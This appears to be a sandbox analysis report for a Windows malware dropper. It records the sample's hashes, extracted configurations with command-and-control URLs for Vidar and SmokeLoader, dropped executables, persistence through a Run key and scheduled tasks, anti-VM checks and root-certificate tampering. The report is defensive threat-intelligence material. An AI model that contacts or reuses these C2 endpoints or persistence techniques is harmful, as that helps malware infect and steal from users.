glupteba | 00646821a7a4410e7e4dc44c57de03e59df39f82dd2cc435b00f3c35b7b80b9c

Analysis

max time kernel
139s
max time network
154s
platform
windows7_x64
resource
win7-en
submitted
07/09/2021, 18:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766.exe
Size

2.8MB
MD5

d66dc705a3856467500a3b14e69e418e
SHA1

e1ae164a5855f4a98ceaeddaf2fae952a178ec34
SHA256

446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766
SHA512

1b8b1dc3d3c1f8fc4e4a9e65079058cf4ae86990ac1efcd7e4104fe4dfc44161facef715469e3c99791e8cc6e29c88137e1ab56d8d12e83a8c35197e771d9a52

Malware Config

Extracted

Family

vidar

Version

40.4

Botnet

706

https://romkaxarit.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

resource	yara_rule
behavioral1/memory/2348-277-0x0000000000400000-0x0000000002F79000-memory.dmp	family_glupteba
behavioral1/memory/1500-363-0x0000000004D20000-0x000000000563E000-memory.dmp	family_glupteba
behavioral1/memory/1500-364-0x0000000000400000-0x0000000002F79000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2216	2056	rundll32.exe	50
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2412	2056	rundll32.exe	50

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

resource	yara_rule
behavioral1/memory/2792-246-0x0000000000330000-0x000000000034F000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 5 IoCs

resource	yara_rule
behavioral1/files/0x0001000000012f3d-140.dat	family_socelars
behavioral1/files/0x0001000000012f3d-127.dat	family_socelars
behavioral1/files/0x0001000000012f3d-145.dat	family_socelars
behavioral1/files/0x0001000000012f3d-151.dat	family_socelars
behavioral1/files/0x0001000000012f3d-150.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
suricata
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral1/memory/1404-154-0x0000000000400000-0x00000000021C1000-memory.dmp	family_vidar

XMRig Miner Payload 1 IoCs

miner

resource	yara_rule
behavioral1/memory/2076-372-0x0000000140000000-0x0000000140763000-memory.dmp	xmrig

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x0001000000012f35-60.dat	aspack_v212_v242
behavioral1/files/0x0001000000012f35-61.dat	aspack_v212_v242
behavioral1/files/0x0002000000012f2f-62.dat	aspack_v212_v242
behavioral1/files/0x0002000000012f2f-63.dat	aspack_v212_v242
behavioral1/files/0x0001000000012f37-66.dat	aspack_v212_v242
behavioral1/files/0x0001000000012f37-67.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 41 IoCs

pid	Process
1748	setup_install.exe
340	Mon15818fcb352.exe
1820	Mon15f819eb2300d8eae.exe
1404	Mon1547d11c23777f6e7.exe
856	Mon1543669f69f247e.exe
536	Mon159345e4f6bd10e49.exe
920	Mon15a53317618120.exe
1836	Mon1590e659d520c442.exe
2492	LzmwAqmV.exe
2608	Chrome 5.exe
2648	PublicDwlBrowser1100.exe
2672	2.exe
2720	setup.exe
2792	Updbdate.exe
2828	setup_2.exe
2876	3002.exe
2892	3632470.exe
2916	setup_2.tmp
2968	jhuuee.exe
3012	BearVpn 3.exe
3032	3002.exe
856	setup_2.exe
2348	LzmwAqmV.exe
2328	setup_2.tmp
2368	3368312.exe
328	4978679.exe
1420	WinHoster.exe
2864	3824269.exe
2664	postback.exe
2960	7313104.exe
1820	3684306.exe
3000	3812442.exe
2988	5792630.exe
2756	5528473.exe
2092	services64.exe
2848	CvC5k3Ixa.exe
1168	rnyuf.exe
1500	LzmwAqmV.exe
2348	sihost64.exe
2796	rnyuf.exe
1240	F67F.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5792630.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7313104.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7313104.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3684306.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3684306.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5792630.exe

Loads dropped DLL 64 IoCs

pid	Process
1664	446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766.exe
1664	446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766.exe
1664	446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766.exe
1748	setup_install.exe
1748	setup_install.exe
1748	setup_install.exe
1748	setup_install.exe
1748	setup_install.exe
1748	setup_install.exe
1748	setup_install.exe
1748	setup_install.exe
1636	cmd.exe
1636	cmd.exe
1464	cmd.exe
1464	cmd.exe
604	cmd.exe
452	cmd.exe
452	cmd.exe
340	Mon15818fcb352.exe
340	Mon15818fcb352.exe
1168	cmd.exe
1524	cmd.exe
1820	Mon15f819eb2300d8eae.exe
1820	Mon15f819eb2300d8eae.exe
1404	Mon1547d11c23777f6e7.exe
1404	Mon1547d11c23777f6e7.exe
856	Mon1543669f69f247e.exe
856	Mon1543669f69f247e.exe
1384	cmd.exe
1836	Mon1590e659d520c442.exe
1836	Mon1590e659d520c442.exe
2232	rundll32.exe
2232	rundll32.exe
2232	rundll32.exe
2232	rundll32.exe
2384	WerFault.exe
2384	WerFault.exe
2384	WerFault.exe
2384	WerFault.exe
2384	WerFault.exe
2384	WerFault.exe
2384	WerFault.exe
2492	LzmwAqmV.exe
2492	LzmwAqmV.exe
2492	LzmwAqmV.exe
2492	LzmwAqmV.exe
2492	LzmwAqmV.exe
2492	LzmwAqmV.exe
2720	setup.exe
2492	LzmwAqmV.exe
2492	LzmwAqmV.exe
2492	LzmwAqmV.exe
2828	setup_2.exe
2828	setup_2.exe
2492	LzmwAqmV.exe
2492	LzmwAqmV.exe
2792	Updbdate.exe
2792	Updbdate.exe
2828	setup_2.exe
2492	LzmwAqmV.exe
2876	3002.exe
2876	3002.exe
2492	LzmwAqmV.exe
2876	3002.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	3368312.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5792630.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7313104.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3684306.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
54	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
2960	7313104.exe
1820	3684306.exe
2988	5792630.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2664 set thread context of 536	2664	postback.exe	93
PID 2092 set thread context of 2076	2092	services64.exe	121

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-GICOI.tmp	setup_2.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
2384	1404	WerFault.exe	41
2204	2892	WerFault.exe	70
2064	328	WerFault.exe	84
2028	3000	WerFault.exe	96
1616	2756	WerFault.exe	99

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Process not Found
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Process not Found
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Process not Found

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1520	schtasks.exe
2224	schtasks.exe
2640	schtasks.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
2432	taskkill.exe
2596	taskkill.exe
1480	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	LzmwAqmV.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	LzmwAqmV.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Mon1547d11c23777f6e7.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c33